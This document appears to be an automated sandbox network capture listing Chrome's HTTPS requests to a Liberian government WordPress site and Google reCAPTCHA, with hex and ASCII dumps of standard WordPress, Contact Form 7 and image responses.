                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 22 Dec 2024 08:44:45 GMT
                                                                                                                        ETag: "30e0-629d7e45429ff"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 12512
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 69 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 74 2e 6f 28 69 2c 73 29 26 26 21 74 2e 6f 28 65 2c 73 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 5b 73 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 53
                                                                                                                        Data Ascii: (()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,S
                                                                                                                        2025-01-10 13:54:48 UTC4689INData Raw: 61 62 6c 65 64 2e 31 32 22 29 2c 74 2e 73 65 74 28 22 73 6c 64 78 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2d 6f 66 66 69 63 65 64 6f 63 75 6d 65 6e 74 2e 70 72 65 73 65 6e 74 61 74 69 6f 6e 6d 6c 2e 73 6c 69 64 65 22 29 2c 74 2e 73 65 74 28 22 73 6c 64 6d 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 70 6f 77 65 72 70 6f 69 6e 74 2e 73 6c 69 64 65 2e 6d 61 63 72 6f 45 6e 61 62 6c 65 64 2e 31 32 22 29 2c 74 2e 73 65 74 28 22 6f 6e 65 74 6f 63 7c 6f 6e 65 74 6f 63 32 7c 6f 6e 65 74 6d 70 7c 6f 6e 65 70 6b 67 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 6e 65 6e 6f 74 65 22 29 2c 74 2e 73 65 74 28 22 6f 78 70 73 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 78 70 73 22 29 2c
                                                                                                                        Data Ascii: abled.12"),t.set("sldx","application/vnd.openxmlformats-officedocument.presentationml.slide"),t.set("sldm","application/vnd.ms-powerpoint.slide.macroEnabled.12"),t.set("onetoc|onetoc2|onetmp|onepkg","application/onenote"),t.set("oxps","application/oxps"),


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        29192.168.2.749810216.58.212.1324432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC701OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                        Host: www.google.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:48 UTC775INHTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                        Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                        Content-Length: 18160
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: sffe
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Expires: Fri, 10 Jan 2025 14:44:48 GMT
                                                                                                                        Cache-Control: public, max-age=3000
                                                                                                                        Age: 0
                                                                                                                        Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                        Content-Type: image/png
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close
                                                                                                                        2025-01-10 13:54:48 UTC615INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                        Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e 82 64 02
                                                                                                                        Data Ascii: UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4d
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa cb 2c af
                                                                                                                        Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/,
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25 c5 0a 16
                                                                                                                        Data Ascii: QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d 42 07 83
                                                                                                                        Data Ascii: ^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]B
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c 98 62 c1
                                                                                                                        Data Ascii: `FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\Lb
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e 01 13 b1
                                                                                                                        Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83 29 20 18
                                                                                                                        Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y)
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25 6d 89 05
                                                                                                                        Data Ascii: kYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%m
                                                                                                                        2025-01-10 13:54:48 UTC1390INData Raw: 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba 4d 8e 61
                                                                                                                        Data Ascii: 4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!draMa


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        30192.168.2.74981369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC448OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC368INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 13 Nov 2024 23:42:19 GMT
                                                                                                                        ETag: "12a8-626d3e272903a"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 4776
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC4776INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53
                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toS


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        31192.168.2.74981269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:47 UTC630OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 22 Dec 2024 08:44:45 GMT
                                                                                                                        ETag: "348c-629d7e4541a5f"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 13452
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 2e 69 31 38 6e 2c 74 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 61 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 60 77 70 63 66 37 24 7b 74 7d 60 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 61 7d 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 7d 2c 6e 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d
                                                                                                                        Data Ascii: (()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"]
                                                                                                                        2025-01-10 13:54:48 UTC5629INData Raw: 66 6f 72 6d 3a 74 2c 64 65 74 61 69 6c 3a 61 7d 3d 65 2e 77 70 63 66 37 3b 64 28 74 29 2c 6e 28 74 2c 22 72 65 73 65 74 74 69 6e 67 22 29 7d 72 65 74 75 72 6e 20 74 28 65 29 7d 29 29 3b 63 6f 6e 73 74 20 75 3d 28 65 2c 74 29 3d 3e 7b 66 6f 72 28 63 6f 6e 73 74 20 61 20 69 6e 20 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 61 5d 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 24 7b 61 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 76 61 6c 75 65 3d 22 22 7d 29 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 69 6d 67 2e 77 70 63 66 37 2d 63 61 70 74 63 68 61 2d 24 7b 61 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 3a 22 2c 22 22 29 7d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65
                                                                                                                        Data Ascii: form:t,detail:a}=e.wpcf7;d(t),n(t,"resetting")}return t(e)}));const u=(e,t)=>{for(const a in t){const n=t[a];e.querySelectorAll(`input[name="${a}"]`).forEach((e=>{e.value=""})),e.querySelectorAll(`img.wpcf7-captcha-${a.replaceAll(":","")}`).forEach((e=>{e


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        32192.168.2.74981169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
